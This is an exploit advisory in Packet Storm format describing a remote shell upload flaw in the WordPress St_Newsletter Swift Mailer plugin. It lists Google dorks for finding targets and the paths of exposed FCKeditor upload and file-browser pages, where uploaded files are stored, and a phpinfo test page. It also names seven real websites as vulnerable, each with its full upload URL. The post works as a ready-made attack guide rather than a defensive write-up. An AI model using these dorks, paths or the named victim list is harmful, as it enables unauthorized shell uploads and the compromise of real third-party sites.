WordPress St_Newsletter Swift Mailer 2.7 Shell Upload

2018-12-20T00:00:00
ID PACKETSTORM:150853
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-20T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote  
Shell Upload Vulnerability  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 20/12/2018  
# Vendor Homepage : wordpress.org ~ forums.devnetwork.net ~  
swiftmailer.symfony.com ~ swiftmailer.org  
# Software Download Link : N/A ~ wordpress.org/plugins/swift-mailer/  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 2.0 ~ 2.0.9 ~ 2.1.2 ~ 2.3 ~ 2.5.1 ~ 2.7  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/st_newsletter/''  
+ intext:''A(c) 2016 Prevent Cancer Now SUM LogoSUM Brand + Design''  
+ intext:''Copyright A(c) 2000-2012 Silicon Valley Fellowship''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
+ CWE-434: Unrestricted Upload of File with Dangerous Type  
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~  
ayarsecurity.com [ Friend ]  
  
#################################################################################################  
  
# Exploit :  
  
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/connectors/test.html  
  
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html  
  
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html  
  
/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html  
  
# Directory File Path :  
  
/wp-content/uploads/......  
  
/wp-content/uploads/[YEAR]/[MONTH]....  
  
# Exploit : phpinfo System Information  
  
/wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php  
  
#################################################################################################  
  
# Note : This plugin St_Newsletter Swift Mailer contains a very serious  
vulnerability that allowed hackers to gain full control a  
  
modify, upload and execute files on any website running WordPress. With the  
plugin installed on a certain website,  
  
a hacker or malicious person can gain access to the web server via HTTP  
through a backdoor in the pluginas directory.  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
revistamoviola.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
earthnc.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
siliconvalleyfellowship.org/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
pedibus-geneve.ch/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
parkdietzassociates.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
storytellerwine.com/wine/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
preventcancernow.ca/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`